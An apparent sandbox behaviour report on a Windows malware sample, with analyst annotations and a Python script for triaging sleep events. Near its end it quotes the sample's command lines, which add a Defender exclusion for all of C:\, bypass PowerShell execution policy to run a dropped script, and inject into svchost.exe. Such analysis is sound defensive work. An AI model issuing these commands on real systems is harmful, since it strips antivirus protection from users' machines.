                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (148 identical events; SetErrorMode with SEM_NOOPENFILEERRORBOX only suppresses the "file not found" dialog and is routine for .NET hosts such as PowerShell, so on its own it is a weak evasion indicator)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (7 identical events; 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively infinite wait produced by the .NET runtime, not a sleep interval chosen by the sample)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3758
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Window / User API: threadDelayed 1767
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Window / User API: threadDelayed 3441
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Window / User API: threadDelayed 3897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4151
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1673
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1838
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Dropped PE file which has not been started: C:\Users\user\Downloads\wpsv.5.6.3.exe
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Evasive API call chain: RegQueryValue, DecisionNodes, Sleep (graph_5-73746)
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Evasive API call chain: RegOpenKey, DecisionNodes, Sleep (graph_5-73745)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 | Thread sleep count: 6000 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 | Thread sleep count: 3758 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1740 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2128 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2836 | Thread sleep count: 282 > 30
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 | Thread sleep count: 1767 > 30
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 | Thread sleep time: -1767000s >= -30000s
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636 | Thread sleep count: 3441 > 30
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636 | Thread sleep time: -34410s >= -30000s
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 | Thread sleep count: 3897 > 30
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 | Thread sleep time: -3897000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 732 | Thread sleep count: 4151 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468 | Thread sleep count: 1673 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1732 | Thread sleep count: 7371 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540 | Thread sleep count: 2030 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668 | Thread sleep count: 3856 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668 | Thread sleep count: 1838 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5468 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432 | Thread sleep count: 165 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical events)
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Thread sleep count: Count: 3441 delay: -10
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_0040C86C FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_0040C2A0 GetModuleHandleW, GetProcAddress, FindFirstFileW, FindClose, lstrlenW, lstrlenW
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_00650754 FindFirstFileW, SetFileAttributesW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_0040C86C FindFirstFileW, FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_0040C2A0 GetModuleHandleW, GetProcAddress, FindFirstFileW, FindClose, lstrlenW, lstrlenW
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_00650754 FindFirstFileW, SetFileAttributesW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_030780F0 wsprintfW, GetLogicalDriveStringsW, lstrcmpiW, lstrcmpiW, QueryDosDeviceW, lstrlenW, __wcsnicmp, lstrcpyW, lstrcpyW, lstrcatW
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_0040E56C GetSystemInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (7 identical events)
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Thread delayed: delay time: 30000
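The sleep and delay events above mix two unrelated things: loops of short sleeps in the sample that add up to more than a sandbox's dwell time (TID 3636: 3441 sleeps of 10 ms, matching the -34410 figure), and the huge wait values that a .NET host such as PowerShell produces by itself. The following Python is an added example, not part of the Joe Sandbox report; it parses lines in the report's own format (the input is a constructed copy of lines from this section, in both the raw run-on form and the separated form) and keeps the two apart. The 30 s budget and the label names are this example's assumptions.

```python
"""Triage the sleep / delay events of a Joe Sandbox behaviour listing.

Added example with constructed input; the thresholds are assumptions.
"""
import re
from collections import defaultdict

# floor(TimeSpan.MaxValue.TotalMilliseconds) = Int64.MaxValue ticks / 10_000.
# A delay equal to this is an "infinite" wait from the .NET runtime.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
EVASION_TOTAL_MS = 30_000                          # assumed sandbox dwell budget

_SRC = re.compile(r"Source:\s+(?P<src>[A-Za-z]:\\\S+?\.exe)")
# "Thread sleep count: Count: 3441 delay: -10" (negative = NT relative timeout)
_LOOP = re.compile(r"Thread sleep count: Count: (?P<n>\d+) delay: -?(?P<ms>\d+)")
_DELAY = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")
_COUNT = re.compile(r"Thread sleep count: (?P<n>\d+) > 30")


def classify_delay(ms):
    """Label one delay value given in milliseconds."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite-wait"        # WaitOne(TimeSpan.MaxValue) and friends
    if ms >= EVASION_TOTAL_MS:
        return "long-sleep"           # a single sleep that outlasts the budget
    return "short-sleep"


def _new_record():
    return {"infinite-wait": 0, "long-sleep": 0, "short-sleep": 0,
            "sleep_calls": 0, "loop_total_ms": 0, "evasive_loop": False}


def triage(lines):
    """Aggregate per process image: delay classes seen, number of sleep calls,
    and whether any short-sleep loop adds up to a budget-beating total."""
    out = defaultdict(_new_record)
    for line in lines:
        src = _SRC.search(line)
        if not src:
            continue                  # not a behaviour line with a process source
        rec = out[src.group("src").rsplit("\\", 1)[-1]]
        m = _LOOP.search(line)
        if m:
            total = int(m.group("n")) * int(m.group("ms"))
            rec["loop_total_ms"] += total
            rec["evasive_loop"] = rec["evasive_loop"] or total >= EVASION_TOTAL_MS
            continue
        m = _DELAY.search(line)
        if m:
            rec[classify_delay(int(m.group("ms")))] += 1
            continue
        m = _COUNT.search(line)
        if m:
            rec["sleep_calls"] += int(m.group("n"))
    return dict(out)


# Constructed input: copies of lines from this report section.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep count: 6000 > 30",
    r"Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeThread delayed: delay time: 30000",
    r"Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636Thread sleep count: 3441 > 30",
    r"Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeThread sleep count: Count: 3441 delay: -10",
]

if __name__ == "__main__":
    for proc, rec in triage(SAMPLE_LINES).items():
        print(proc, rec)
```

Run on the constructed lines, powershell.exe ends up with only infinite waits and no evasive loop, while leBwnyHIgx.exe shows a 30 s single sleep plus a 3441 x 10 ms loop totalling 34.4 s, which is the pattern worth reporting.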
Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltrues ("Hyper-V RAW" is the name of the Winsock catalog provider in mswsock.dll and appears in any process that initialises Winsock; it is not evidence of VM detection by the sample)
Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWu?M
Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | API call chain: ExitProcess graph end node (graph_5-72390)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_10016A5E IsProcessorFeaturePresent, memset, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (this exact sequence is the MSVC CRT's security-cookie failure handler, __report_gsfailure, and is compiled into most binaries; it is not a hand-written anti-debugging check)
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_0308054D VirtualProtect ?,-00000001,00000104,?
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_03077490 wsprintfW, LoadLibraryW, GetProcAddress, MultiByteToWideChar, swprintf, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, FreeLibrary
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_00CD0AE4 mov eax, dword ptr fs:[00000030h] (reads the PEB pointer from the TEB on 32-bit Windows; this is the same access IsDebuggerPresent makes to test PEB.BeingDebugged, but loader and CRT code also perform it)
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_00D90AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_026C0AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_02EF00CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_03076790 wsprintfW, GetTokenInformation, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation, LookupAccountSidW, GetLastError, GetProcessHeap, HeapFree
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (5 identical events)
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_10016A5E IsProcessorFeaturePresent, memset, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_10016D55 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_00CE6D2C SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_0307DF10 Sleep, CloseHandle, GetLocalTime, wsprintfW, SetUnhandledExceptionFilter, CloseHandle, EnumWindows, EnumWindows, Sleep, EnumWindows, Sleep, CreateEventA, Sleep, RegOpenKeyExW, RegQueryValueExW, CloseHandle, Sleep, WaitForSingleObject, CloseHandle, Sleep, CloseHandle, WaitForSingleObject, CloseHandle, Sleep, CloseHandle
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_0307F00A IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_03081F67 _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_02718587 _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_02716815 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_10016A5E IsProcessorFeaturePresent, memset, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_10016D55 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_00DA6D2C SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_030777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 5_2_030777E0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_0063DDA4 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 0_2_0063DDA4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_005B20A4 InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 0_2_005B20A4
